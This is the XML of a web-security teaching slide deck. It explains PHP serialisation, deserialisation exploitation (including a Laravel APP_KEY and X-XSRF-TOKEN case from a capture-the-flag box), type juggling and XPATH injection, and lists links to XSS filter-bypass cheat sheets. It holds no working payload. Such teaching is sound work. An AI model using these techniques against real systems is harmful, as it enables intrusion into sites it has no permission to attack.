            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8757000" cy="385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200"/>
              <a:t>What is Serialisation?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>A way of programming languages storing objects so they can be reconstructed (deserialised) later</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Many languages do this, including Java and PHP - a common web scripting language!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>PHP Serialisation</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>PHP serialises objects like so: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>O:6:“Object”:1:{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:“var”;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:5:“value”;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>The syntax is: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>OBJ_TYPE:NAME_LENGTH:NAME:NUM_VARIABLES:{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name_type:name_length:name;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value_type:value_length:value;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>The Vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Some programs can introduce deserialisation vulnerabilities if they deserialise untrusted data</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Certain methods are called when an object is deserialised - in PHP, these are called ‘magic methods’, and include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__wakeup()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__unserialize()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__destruct()</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>You can find a full list here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.php.net/manual/en/language.oop5.magic.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p27"/>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Deserialisation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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="923875"/>
            <a:ext cx="8520600" cy="420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100"/>
              <a:t>Exploiting Deserialisation</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Finding a vulnerable function</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Site source code? Find it in backup files, .git folders etc</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>call and the corresponding class</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify vulnerable methods (e.g. __destruct, __wakeup) within the code</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Crafting a payload</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Generate serialised object, setting variables as needed</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Trigger the exploit by passing your object</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Time for a demo!</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>What went wrong with Academy?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The Laravel Framework stores users as a serialised object when managing sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>It includes an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> call when decoding a user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-XSRF-TOKEN</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>If we can create a valid token (using the leaked APP_KEY), we can cause Laravel to unserialise a custom-written object</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The payload itself is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, which won’t fit in these slides...</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>This pair of posts explains it very well! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://0xdf.gitlab.io/2021/02/27/htb-academy.html#shell-manually</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Mitigation? Don’t deserialise untrusted data!</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p28"/>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Deserialisation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Type Juggling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Vulnerability occurs because of PHP’s weird behaviour comparing values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>For example, it tries to extract integers from strings:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(“7 Puppies” == 7) -&gt; True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(“Puppies” == 0) -&gt; True</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>This can cause issues if a type juggling comparison occurs in authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>XPATH Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Similar to SQL Injection, with a few syntax differences</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>May look the same initially - but this is handling XML data rather than SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Also possible to do password extraction attacks!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/XPATH_Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ippsec </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Unbalanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=L_FYYJPVywM&amp;t=2650s</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p29"/>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Miscellaneous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Resources</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="923875"/>
            <a:ext cx="8520600" cy="411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900"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/Double_Encoding</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/support/xss-beating-html-sanitizing-filters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/contexts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://null-byte.wonderhowto.com/how-to/advanced-techniques-bypass-defeat-xss-filters-part-1-0190257/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://gosecure.github.io/presentations/2017-12-04-confoo/Bypassing%20Modern%20XSS%20Protections.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
